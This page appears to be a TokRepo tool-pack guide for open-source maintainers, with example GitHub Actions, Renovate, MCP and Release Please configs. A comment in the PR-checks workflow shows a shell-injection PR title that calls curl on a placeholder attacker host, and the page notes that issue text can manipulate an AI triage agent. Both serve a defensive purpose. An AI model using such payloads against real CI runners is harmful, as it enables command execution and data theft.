TOKREPO · ARSENAL

Open Source Maintainer AI Pack — Run a GitHub Repo End-to-End

The 10 picks a solo or small-team OSS maintainer would wire onto a real GitHub repo: GitHub MCP for AI access, actionlint to keep workflows honest, PR-Agent + reviewdog + Claude Code Security Review for layered PR review, Renovate + Gitleaks for dependency and secret hygiene, Release Please for changelog-driven releases, Docusaurus for docs, Weblate for community translations. Install in this order and AI takes the first pass on issue triage / PR review / release / docs / i18n.


What's in this pack

You maintain an open-source repo. Maybe alone, maybe with one or two others. Issues pile up faster than you can triage. Every dependency update is a possible 2am page. Releases drift because changelog-writing feels like homework. The docs site is two versions behind the code. A friendly translator showed up six months ago and you still haven't merged their PR.

This pack is the 10 tools a working OSS maintainer would actually wire onto a real GitHub repo to put AI in front of the boring layer — so humans stay on the parts only humans can do: API design, breaking-change calls, community tone, who gets commit bit.

The pack covers five layers:

  • Issue & PR access — give an AI agent typed, safe access to your repo (GitHub MCP) and keep the Actions workflows themselves honest (actionlint).
  • PR review — a layered first pass before a human opens the diff: AI reviewer (PR-Agent), lint-as-inline-comments (reviewdog), security-specific audit (Claude Code Security Review).
  • Dependencies & secrets — keep the supply chain moving without 2am pages: Renovate for grouped, scheduled updates; Gitleaks to catch accidental secret commits.
  • Release & changelog — Release Please reads conventional commits and ships PRs that update CHANGELOG, bump versions, cut GitHub Releases.
  • Docs & community translation — Docusaurus for a docs site that doesn't rot; Weblate so the eighteen people who'd love to translate your README don't have to file a PR per string.

Who this is not for: a 50-engineer corporate monorepo (you have an internal platform team — different problem). A 100-star side project (overkill — install GitHub MCP + actionlint and stop). The sweet spot is a repo with 500-50,000 stars, 1-5 maintainers, real outside contributors, and at least one paid downstream that complains when you break things.

Install in this order

  1. GitHub MCP Server — Official GitHub AI Integration — Foundation. Wire Claude (or any MCP-compatible agent) into GitHub: issues, PRs, diffs, comments, labels, branches, Actions status, security alerts. Every later AI step in this pack assumes the agent can talk to GitHub. Without MCP your AI is reading screenshots.
  2. actionlint — Lint GitHub Actions Locally — Before you trust any GitHub Action to do anything (including everything else in this pack), run actionlint on .github/workflows/. Catches expression type errors, broken if: conditionals, invalid permissions: scopes, unknown inputs on popular actions, and the classic script-injection hole: a run: step that expands untrusted github.event values (PR title, issue body, branch name) straight into a shell. It will not tell you an actions/checkout@v3 pin is stale; that is Renovate's job (#6). Cheapest insurance you'll ever buy. Run on pre-commit and in CI.
  3. PR-Agent — AI-Powered Code Review for Pull Requests — On every PR open: structured description, multi-section review (key changes / suggestions / security / tests), and /ask follow-ups in comments. The AI first pass that catches the boring 60% so reviewers start at architecture, not formatting.
  4. reviewdog — Turn Lint Into PR Review Comments — Whatever linters you already run (ESLint / golangci-lint / ruff / clippy / etc.), reviewdog reposts their findings as inline comments on the exact diff line. Stop hunting through CI logs. Pairs with PR-Agent: AI does prose review, reviewdog does deterministic lint.
  5. Claude Code Security Review — PR Audit Action — A second AI reviewer with a security-specific prompt: SQL injection, auth bypass, leaked secrets, unsafe deserialization, supply-chain weirdness. Distinct from PR-Agent because its prompt is scoped to vulnerability classes rather than general code quality, so the two rarely duplicate each other. Skip it on docs-only PRs (path filter) to save tokens and noise.
  6. Renovate — Automated Dependency Update Bot — Grouped, scheduled, configurable. Beats the default Dependabot setup once you have >50 deps: combine all patch updates into one PR, schedule majors for Tuesday morning, auto-merge devDependencies after CI green. Free for OSS; one config file.
  7. Gitleaks — Find Secrets in Git Repos and Code — Pre-commit hook + GitHub Action. The day you accept an outside PR that contains a .env.example with a real token, you'll wish you'd installed this last week. Cheap, catches the obvious, runs in seconds.
  8. Release Please — Automated Releases Based on Conventional Commits — Reads conventional commits since last tag, opens a release PR with version bump + CHANGELOG diff. Merge the release PR → it tags, cuts a GitHub Release, optionally publishes. The release ritual collapses from "write changelog, bump version, tag, push, write release notes" to "approve the bot's PR."
  9. Docusaurus — Documentation Sites Made Easy — React-based docs site (Meta-built, MIT). Versioning, dark mode, search via Algolia DocSearch, MDX. Deploys to GitHub Pages with one Action. The docs site that doesn't make you cringe to send people to.
  10. Weblate — Web-Based Continuous Localization Platform — Community translators get a web UI to translate strings; their work flows back as PRs to your repo. Self-host or use Hosted Weblate (free for libre projects). This is how you stop losing the translator who showed up in March and how you actually ship in 7 languages.
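The workflow below is an added example, not a file shipped with this pack or by any of the projects it lists. It wires items 2, 4 and 7 onto every PR and shows the one thing actionlint is really guarding against: a run: step that expands the PR title straight into the shell (left in as a comment) beside the hardened form that binds the value to an environment variable first. Action names and inputs are those documented by reviewdog/action-actionlint and gitleaks/gitleaks-action at the time of writing; the file name, the version tags and the fail_on_error input are assumptions to check against the current READMEs before you commit this.

```yaml
# .github/workflows/pr-checks.yml   (added example; file name is an assumption)
name: pr-checks

on:
  pull_request:              # NOT pull_request_target: a PR from a fork gets a read-only token,
    branches: [main]         # so a malicious PR cannot use this job to reach your secrets

# Least privilege at the workflow level; each job widens only what it needs.
permissions:
  contents: read

concurrency:
  group: pr-checks-${{ github.event.pull_request.number }}
  cancel-in-progress: true

jobs:
  lint-workflows:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      pull-requests: write          # reviewdog needs this to post inline review comments
    steps:
      - uses: actions/checkout@v4
        with:
          persist-credentials: false  # do not leave the token in .git/config for later steps

      # actionlint run through reviewdog (#2 + #4): findings land on the exact diff line.
      - uses: reviewdog/action-actionlint@v1
        with:
          github_token: ${{ secrets.GITHUB_TOKEN }}
          reporter: github-pr-review
          level: error
          fail_on_error: true         # assumed input name; check the action's README

      # --- The hole actionlint flags: untrusted input expanded inside a shell script.
      # A PR title containing  "; curl https://attacker.example/$(id); echo "
      # (placeholder host) breaks out of the quotes and runs on your runner.
      #
      # - run: echo "Reviewing ${{ github.event.pull_request.title }}"
      #
      # --- Hardened: bind it to an env var. The shell now sees it as data, never as code.
      - name: Echo PR title safely
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: printf 'Reviewing %s\n' "$PR_TITLE"

  secrets:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0              # Gitleaks scans every commit on the PR, not only HEAD
          persist-credentials: false
      # Gitleaks (#7): the check fails if any commit in the PR carries a token or key.
      - uses: gitleaks/gitleaks-action@v2
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          # GITLEAKS_LICENSE is only required for organisation-owned repos
```

On PRs from forks the job's token is read-only, so reviewdog cannot post its comments; the check still fails red, which is the safe default. Do not "fix" that by switching the trigger to pull_request_target: that event runs with a write token and your secrets, and checking out the PR head under it hands both to the contributor.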

How they fit together

        Contributor                      GitHub repo                    Maintainer (you)
        ───────────                      ───────────                    ────────────────
  opens issue ──────────────▶  Issues  ─── GitHub MCP (#1) ──▶  AI triage (label, assign, ask for repro)
                                                                       │
                                                                       ▼
  opens PR    ──────────────▶  PR opens ──▶  actionlint (#2 on workflow files)
                                            PR-Agent (#3 prose review)
                                            reviewdog (#4 lint inline)
                                            Security Review (#5 audit)
                                                                       │
                                                                       ▼
                                                            you see: 3-line AI summary
                                                                    + 5 ranked comments
                                                                    + green CI
                                                            you decide: merge / nudge / close
                                                                       │
  Renovate (#6) ─── opens dep-update PRs ─────▶  ── same review pipeline ─┘
  Gitleaks (#7) ─── blocks secret commits before merge
                                                                       │
                                                                       ▼
                                                  Release Please (#8) opens release PR
                                                  reads conventional commits since last tag
                                                  → CHANGELOG diff + version bump
                                                                       │
                                                              merge release PR ─▶ tag + GitHub Release
                                                                       │
                                                                       ▼
                                                  Docusaurus (#9) docs site rebuilds
                                                  Weblate (#10) pulls new strings → translators → back as PRs

The load-bearing trio is GitHub MCP (#1) + reviewdog (#4) + Release Please (#8) — access, signal-to-noise transform on every PR, and the release loop that finally closes by itself. Add the AI reviewers (#3, #5) for prose judgment; add Renovate (#6) and Gitleaks (#7) once the review pipeline can actually digest their PRs; add docs (#9) and translation (#10) once the repo deserves them.

Tradeoffs you'll hit

  • Auto-merge on dependency PRs is a footgun. Renovate + green CI + auto-merge sounds great until a patch-level update of a transitive dep bricks production. Auto-merge only for devDependencies and only after a full test run (not just lint). Majors stay manual forever.
  • AI reviewers can read as condescending in OSS. A first-time contributor opens a 12-line PR and gets a 400-word "the AI thinks you should restructure this" reply. That contributor doesn't come back. Set PR-Agent + Security Review to only post on "high" or "critical" by default. Reserve the verbose review for trusted contributors or label-gated ai-review opt-in.
  • Machine translation quality varies wildly. Weblate can suggest translations from DeepL / OpenAI / Google — useful for kickstarting a locale, dangerous as the final string. Always require a human reviewer for any locale that's marketing-facing (README, docs landing) before merging machine-suggested PRs.
  • Release Please's changelog can read like a robot wrote it. Because one did. If your audience is users (not just other developers), spend 5 minutes editing the release PR description into human prose before merging. The bot writes "feat(api): add retry-after header support"; you rewrite to "You can now configure how long the client backs off after a 429."
  • Stale-bot logic is intentionally left out of this pack. Closing inactive issues automatically tends to anger users who reported real bugs that you didn't get to. If you must, run it manually with a high threshold (180+ days) and a personally-written message, not on a cron with template prose.

Common pitfalls

  • Auto-stale closes valid issues. A bug filed against v2.1 that you fixed in v3.0 sits in the queue with no comments. The stale bot closes it. The original reporter sees a notification 6 months later: "Closed as inactive." They tell their friends your project is unwelcoming. Don't auto-close. Auto-label needs-triage. Triage manually or with AI assist (#1).
  • Auto-merging Renovate PRs on Dependabot-style defaults breaks on transitive deps. A lockfile-only update looks safe but can bump a transitive dependency that changes runtime behavior. Require the full test suite green, not just a clean install, and do not auto-merge anything that ends up in a production binary.
  • PR-Agent or the MCP triage agent (#1) labels the PR with the wrong area. Most AI label classifiers get 80% right and 20% confidently wrong. Treat AI labels as suggestions; require a human (or a deterministic CODEOWNERS-based) label for anything that routes notifications. Wrong label = wrong reviewer = PR dies.
  • Changelog reads like feat(api): add new flag. That's the commit message, not the release note. Either edit Release Please's PR before merging, or set its config to use a different section template so user-facing wins are surfaced separately from internal refactors.
  • Docusaurus deployed to gh-pages once, never again. The Action ran on a 2-year-old token. The token expired. Nobody noticed for 8 months. The docs are 8 months behind the code. Use GitHub Pages deploy via GITHUB_TOKEN (minted fresh for every run and expired when the job ends), not a long-lived PAT. And add a weekly cron that just verifies the docs site is reachable.
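The workflow below is an added example of the last pitfall's fix, not a file from this pack or from the Docusaurus project. It publishes the docs site through the official Pages actions, which authenticate with the run's own GITHUB_TOKEN plus an OIDC token, so there is no PAT to expire, and it adds the weekly reachability check as a separate job on a cron. The file name, the website/ directory, the Node version and the DOCS_URL value are assumptions; the action names and versions are the ones GitHub documents for Pages deployments at the time of writing.

```yaml
# .github/workflows/docs.yml   (added example; paths and URL are assumptions)
name: docs

on:
  push:
    branches: [main]
    paths: ['website/**', '.github/workflows/docs.yml']
  schedule:
    - cron: '17 6 * * 1'        # Monday 06:17 UTC: is the live site still answering?
  workflow_dispatch:

permissions:
  contents: read

jobs:
  build:
    if: github.event_name != 'schedule'
    runs-on: ubuntu-latest
    defaults:
      run:
        working-directory: website       # assumed Docusaurus project directory
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: 20
          cache: npm
          cache-dependency-path: website/package-lock.json
      - run: npm ci
      - run: npm run build                 # Docusaurus writes the static site to build/
      - uses: actions/configure-pages@v5
      - uses: actions/upload-pages-artifact@v3
        with:
          path: website/build

  deploy:
    needs: build
    runs-on: ubuntu-latest
    permissions:
      pages: write        # publish the uploaded artifact
      id-token: write     # OIDC token proves to Pages that this run is allowed to deploy
    environment:
      name: github-pages
      url: ${{ steps.deployment.outputs.page_url }}
    steps:
      - id: deployment
        uses: actions/deploy-pages@v4   # uses the run's GITHUB_TOKEN; nothing long-lived to rotate

  reachable:
    if: github.event_name == 'schedule'
    runs-on: ubuntu-latest
    env:
      DOCS_URL: https://example.github.io/example-project/   # assumed; put your site here
    steps:
      # -f turns any non-2xx into a failure; --retry tolerates a blip; a red run emails you.
      - run: >-
          curl -fsSL --retry 3 --retry-delay 10 -o /dev/null
          -w 'HTTP %{http_code} from %{url_effective}\n' "$DOCS_URL"
```

Two settings outside the file have to match it: in the repo settings, Pages must be set to deploy from GitHub Actions rather than from a branch, and the github-pages environment must exist (it is created the first time deploy-pages runs). If the scheduled job goes red, check the workflow run history first: a build that has silently stopped triggering is the same failure mode as the expired token, just further upstream.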
INSTALL · ONE COMMAND
$ tokrepo install pack/open-source-maintainer-ai
hand it to your agent — or paste it in your terminal
What's inside

10 assets in this pack

MCP#01
GitHub MCP Server — Official GitHub AI Integration

GitHub's official MCP server that lets AI assistants manage repos, issues, PRs, Actions, and code search through the Model Context Protocol.

by GitHub
$ tokrepo install github-mcp-server-official-github-ai-integration-679a2650
Script#02
actionlint — Lint GitHub Actions Locally

actionlint catches syntax mistakes and expression/type errors in GitHub Actions workflows before CI runs, so broken YAML never blocks your team.

by Script Depot
$ tokrepo install actionlint-lint-github-actions-locally
Skill#03
PR-Agent — AI-Powered Code Review for Pull Requests

AI code reviewer for GitHub/GitLab/Bitbucket PRs. Auto-generates descriptions, reviews code, suggests improvements, answers questions. By Qodo. 10.7K+ stars.

by Script Depot
$ tokrepo install pr-agent-ai-powered-code-review-pull-requests-2d7fe041
Script#04
reviewdog — Turn Lint Into PR Review Comments

reviewdog reads any linter output and posts precise PR comments or Checks, so teams can enforce quality without noisy, copy-pasted logs in reviews.

by Script Depot
$ tokrepo install reviewdog-turn-lint-into-pr-review-comments
Skill#05
Claude Code Security Review — PR Audit Action

Claude Code Security Reviewer is a GitHub Action that scans PR diffs for security issues and comments findings on the PR using a Claude API key.

by Script Depot
$ tokrepo install claude-code-security-review-pr-audit-action
Skill#06
Renovate — Automated Dependency Update Bot

Renovate keeps your dependencies fresh by automatically opening pull requests for updates across 90+ package managers, with fine-grained control over grouping, scheduling, and automerge.

by Script Depot
$ tokrepo install renovate-automated-dependency-update-bot-9b8e21a5
Skill#07
Gitleaks — Find Secrets in Git Repos and Code

Gitleaks is a fast SAST tool for detecting hardcoded secrets like passwords, API keys, and tokens in Git repositories. It scans commit history and source code using regex patterns, preventing secret leaks before they reach production.

by AI Open Source
$ tokrepo install gitleaks-find-secrets-git-repos-code-40b108c4
Skill#08
Release Please — Automated Releases Based on Conventional Commits

Release Please generates release pull requests and changelogs from Conventional Commit messages, automating semantic versioning and publishing for GitHub repositories.

by Script Depot
$ tokrepo install release-please-automated-releases-based-conventional-commits-2bb669cb
Skill#09
Docusaurus — Documentation Sites Made Easy

Build fast, SEO-friendly documentation websites with React and Markdown. By Meta. Powers 10K+ sites. 64K+ GitHub stars.

by AI Open Source
$ tokrepo install docusaurus-documentation-sites-made-easy-2c489776
Skill#10
Weblate — Web-Based Continuous Localization Platform

A web-based translation management system with tight version control integration. Weblate automates the localization workflow with translation memory, machine translation, and quality checks.

by AI Open Source
$ tokrepo install weblate-web-based-continuous-localization-platform-cb2ceff8
Frequently asked questions

Is it safe to auto-merge Renovate / dependabot PRs?

Conditionally yes for devDependencies, almost never for production dependencies. Safe pattern: auto-merge devDependencies patch + minor after the full test suite (not just lint) is green; require human approval for any prod dep, any major bump, and any change that touches lockfile-resolved transitives in your runtime path. The blast radius of an unattended bad merge in your build tools is small; in your shipped binary it can be a service incident. Configure with automerge: false as the default and explicit packageRules for the safe categories.
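The config below is an added example of the policy this answer and the Renovate entry (#6) describe, not a file from this pack or from the Renovate project. Renovate reads JSON, so this is renovate.json at the repo root. The default is automerge: false; only one packageRule turns it on, for non-major devDependencies, and Renovate only automerges once the required status checks on the PR are green, so it is gated by your full test workflow rather than by install success. The depType names assume an npm project (other ecosystems use different depTypes); the minimumReleaseAge value and the schedule are assumptions to tune.

```json
{
  "$schema": "https://docs.renovatebot.com/renovate-schema.json",
  "extends": ["config:recommended"],
  "dependencyDashboard": true,
  "automerge": false,
  "automergeType": "pr",
  "minimumReleaseAge": "3 days",
  "prConcurrentLimit": 5,
  "packageRules": [
    {
      "description": "The one safe category: dev-only, non-major, merged only after full CI is green",
      "matchDepTypes": ["devDependencies"],
      "matchUpdateTypes": ["minor", "patch"],
      "groupName": "dev dependencies (non-major)",
      "automerge": true
    },
    {
      "description": "Runtime patch updates: one grouped PR, a human merges it",
      "matchDepTypes": ["dependencies"],
      "matchUpdateTypes": ["patch"],
      "groupName": "runtime patch updates",
      "automerge": false
    },
    {
      "description": "Majors wait for Tuesday morning and a human, forever",
      "matchUpdateTypes": ["major"],
      "schedule": ["before 6am on tuesday"],
      "automerge": false,
      "labels": ["needs-human-review"]
    },
    {
      "description": "Actions used in CI are pinned to commit digests and never automerged",
      "matchManagers": ["github-actions"],
      "pinDigests": true,
      "automerge": false
    }
  ],
  "vulnerabilityAlerts": {
    "labels": ["security"],
    "automerge": false
  }
}
```

minimumReleaseAge is the supply-chain knob: a freshly published version sits for three days before Renovate proposes it, which is long enough for most hijacked-package releases to be yanked. The github-actions rule exists because a tag such as v4 can be moved to new code after you reviewed it; a digest cannot.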

Does AI review (PR-Agent, Claude Code Security Review) replace human reviewers?

No — it shifts what humans review. AI catches the boring 60% (style, missing tests, obvious security smells, breaking-change naming). Humans still do the load-bearing 40%: is this the right abstraction, does this feature belong in the project at all, what's the upgrade path for users on the old API, can we live with this for 5 years. On a healthy OSS repo, AI review means more PRs get any review at all (the queue stops being the bottleneck), but the merge decision stays human.

Which translation tool — Weblate, Crowdin, or just Pull Requests with Markdown?

Weblate if you want self-hosted control and have any contributors who'd rather use a web UI than write YAML. Crowdin (commercial, free OSS plan) if you want a polished product and don't mind a SaaS dependency. Plain PRs against docs/i18n/*.md if you have 2-3 strong technical translators who already know git. Picking Weblate here because it's open, self-hostable, integrates back into git as PRs (so it survives migration), and Hosted Weblate is free for libre projects so you don't even have to run it yourself to start.

How do I actually deploy AI issue triage without it labeling everything wrong?

Three-step ramp. Step 1: connect GitHub MCP (#1) and run an agent over open issues in read-only mode — have it propose labels in a Markdown report, you spot-check. Step 2: enable write access but only for a non-routing label like triaged-ai; humans still apply routing labels. Step 3: once you've watched accuracy for two weeks and it's consistently 90%+, enable writing area labels. Always keep needs-human-triage as the default for low-confidence cases — better an unlabeled issue than a wrong-labeled one that lands in the wrong reviewer's inbox.
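The config below is an added example of the three-step ramp, not a file from this pack or from GitHub's own documentation. It registers two instances of the GitHub MCP server in a Claude Code project file (.mcp.json; Claude Desktop uses the same mcpServers shape): one locked to read-only for step 1, and one with write access for step 2 but limited to the issues toolset. GITHUB_READ_ONLY and GITHUB_TOOLSETS are the server's documented switches at the time of writing; the ${...} substitution is Claude Code's environment-variable expansion; the two PAT variable names are assumptions. Each token should be a fine-grained PAT scoped to this one repository with Issues: read (step 1) or Issues: read and write (step 2). Read-only is enforced in two places on purpose: the server flag removes the write tools from what the agent can call at all, and the token makes a forgotten flag harmless. Issue bodies are attacker-controlled text that the agent reads, so an agent with write tools can be talked into applying labels or posting comments you never asked for.

```json
{
  "mcpServers": {
    "github-triage-readonly": {
      "command": "docker",
      "args": [
        "run", "-i", "--rm",
        "-e", "GITHUB_PERSONAL_ACCESS_TOKEN",
        "-e", "GITHUB_READ_ONLY=1",
        "-e", "GITHUB_TOOLSETS=issues,pull_requests,repos",
        "ghcr.io/github/github-mcp-server"
      ],
      "env": {
        "GITHUB_PERSONAL_ACCESS_TOKEN": "${GITHUB_PAT_TRIAGE_RO}"
      }
    },
    "github-triage-label": {
      "command": "docker",
      "args": [
        "run", "-i", "--rm",
        "-e", "GITHUB_PERSONAL_ACCESS_TOKEN",
        "-e", "GITHUB_TOOLSETS=issues",
        "ghcr.io/github/github-mcp-server"
      ],
      "env": {
        "GITHUB_PERSONAL_ACCESS_TOKEN": "${GITHUB_PAT_TRIAGE_ISSUES_RW}"
      }
    }
  }
}
```

For step 1 point the agent at github-triage-readonly only and have it write its proposed labels into a Markdown report. For step 2 add github-triage-label and instruct it to apply nothing but triaged-ai. Step 3 is the same server with a wider instruction, not a wider token: routing labels are still just Issues: write, so the PAT does not change. Keep the tokens out of the file itself; the expansion reads them from your shell environment, and a .mcp.json with literal tokens is exactly what Gitleaks (#7) will catch you committing.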

How do I make Release Please / changelog generators not read like a robot?

Three knobs. (1) Enforce conventional commits at commit time (Commitlint, a separate skill): a commit titled "fix: handle empty array" gives the bot something to work with; one titled "update stuff" becomes its input as-is. Garbage in, robot prose out. (2) Configure Release Please's changelog sections so user-visible types (feat, fix, perf) render under prose-friendly headers like "What's new" / "Fixed" / "Performance," and internal types (chore, refactor, ci, test) are hidden. (3) Before merging the release PR, spend 5 minutes editing the body. Lead with the user-visible win in one sentence ("This release adds opt-in retry-after handling so your client respects rate limits."), then let the auto-generated list follow. The bot drafts; you finish.
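The config below is an added example of knob (2), not a file from this pack or from the Release Please project. Release Please reads JSON, so this is release-please-config.json at the repo root, in manifest mode (it expects a companion .release-please-manifest.json holding the current version, for example {".": "1.4.2"}; that version is an assumption). Each entry maps a conventional-commit type to a changelog header; hidden entries are still parsed for version bumping but do not appear in the release notes. The release-type value assumes a Node package; use the one for your ecosystem.

```json
{
  "$schema": "https://raw.githubusercontent.com/googleapis/release-please/main/schemas/config.json",
  "release-type": "node",
  "include-component-in-tag": false,
  "packages": {
    ".": {
      "changelog-sections": [
        { "type": "feat", "section": "What's new" },
        { "type": "fix", "section": "Fixed" },
        { "type": "perf", "section": "Performance" },
        { "type": "docs", "section": "Documentation", "hidden": true },
        { "type": "chore", "section": "Internal", "hidden": true },
        { "type": "refactor", "section": "Internal", "hidden": true },
        { "type": "test", "section": "Internal", "hidden": true },
        { "type": "ci", "section": "Internal", "hidden": true }
      ]
    }
  }
}
```

One interaction with #6 to decide deliberately: Renovate's default commit type is chore(deps), which this config hides, so dependency bumps vanish from the release notes. If your paid downstream needs to see that a runtime dependency moved, give those PRs a visible type in the Renovate config rather than unhiding all of chore.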
